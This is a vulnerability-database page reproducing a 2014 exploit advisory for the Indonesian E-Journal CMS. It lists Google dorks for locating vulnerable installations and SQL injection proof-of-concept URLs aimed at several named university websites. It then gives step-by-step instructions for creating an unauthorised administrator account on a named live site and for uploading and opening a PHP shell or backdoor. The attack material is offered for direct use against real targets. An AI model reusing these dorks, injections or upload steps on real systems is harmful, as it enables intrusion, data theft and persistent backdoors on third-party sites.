Vulners
Lucene search
E-Journal 1.0 Shell Upload / SQL Injection
`==========================================================================================
E-Journal (Old Version) Multiple Vulnerabilities
==========================================================================================
:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : E-Journal (Old Version) Multiple Vulnerabilities
: # Date : 17th December 2014
: # Author : X-Cisadane
: # CMS Developer : http://simlitabmas.dikti.go.id/ejournal/
: # Version : Old Version
: # CMS Language : Indonesian
: # Category : Web Applications
: # Vulnerability : SQL Injection, Privilege Escalation and File Upload Vulnerability
: # Tested On : Google Chrome Version 39.0.2171.95 m (Windows 7 Ultimate 32-Bit English)
: # Greetz to : X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari
:-------------------------------------------------------------------------------------------------------------------------:
DORKS (How to find the target) :
================================
inurl:mahasiswa.php intitle:E-Journal
inurl:dosen.php intitle:E-Journal
inurl:jurnal.php intitle:E-Journal
inurl:dokumen.php intitle:E-Journal
"Karya Tulis Mahasiswa" intitle:E-Journal
"Design & Programming by" intitle:E-Journal
"E-Journal adalah aplikasi berbasis web untuk"
Or use your own Google Dorks :)
P.S : This E-Journal CMS has 2 versions, The Old Version doesn't have informasi.php (Informasi Menu).
Proof of Concept
================
[ 1 ] SQL Injection
POC :
http://[Site]/[Path]/jurnal.php?detail=jurnal&id=['SQLi]
Example :
http://e-journal.uniga.ac.id/jurnal.php?detail=jurnal&id='133
http://www.ejournal-fkipunibba.com/jurnal.php?detail=jurnal&id='133
http://e-journal.uika-bogor.ac.id/jurnal.php?detail=jurnal&id='133
http://ejurnal.unjani.ac.id/jurnal.php?detail=jurnal&id='133
http://ejournal.stikesborromeus.ac.id/jurnal.php?detail=jurnal&id='133
...etc...
[ 2 ] Privilege Escalation
You can create a new Administrator Account by Using this Trick.
For Example my Target is : http://www.ejournal-fisipunla.com/
Step 1 : Add data.php?tambah=dosen in the URL
So in this case the URL was http://www.ejournal-fisipunla.com/data.php?tambah=dosen
Step 2 : Then you can see this notice : "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR".
Ignore that Notice and click Admin Menu.
Screenshot #1 : http://i59.tinypic.com/54he2b.png
Step 3 : Tadaaa... Now you can add an Administrator Account.
Screenshot #2 : http://i59.tinypic.com/2i8vyus.png
[ 3 ] Upload PHP File (PHP Shell / Backdoor)
After New Administrator Account was Created, you can logon as an Administrator and Upload a Php File.
Admin Control Panel Path : http://[Site]/[Path]/admin.php
Example : http://www.ejournal-fisipunla.com/admin.php
Then Upload your PHP Shell / Backdoor from http://[Site]/[Path]/data.php?tambah=dosen
Upload your Php File in the File and Cover form.
Screenshot #3 : http://i59.tinypic.com/24cxhrc.png
Open your Backdoor / PHP Shell in :
http://[Site]/[Path]/cover/your php file name.php
http://[Site]/[Path]/file/your php file name.php
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2014 00:00Current
0.2Low risk
Vulners AI Score0.2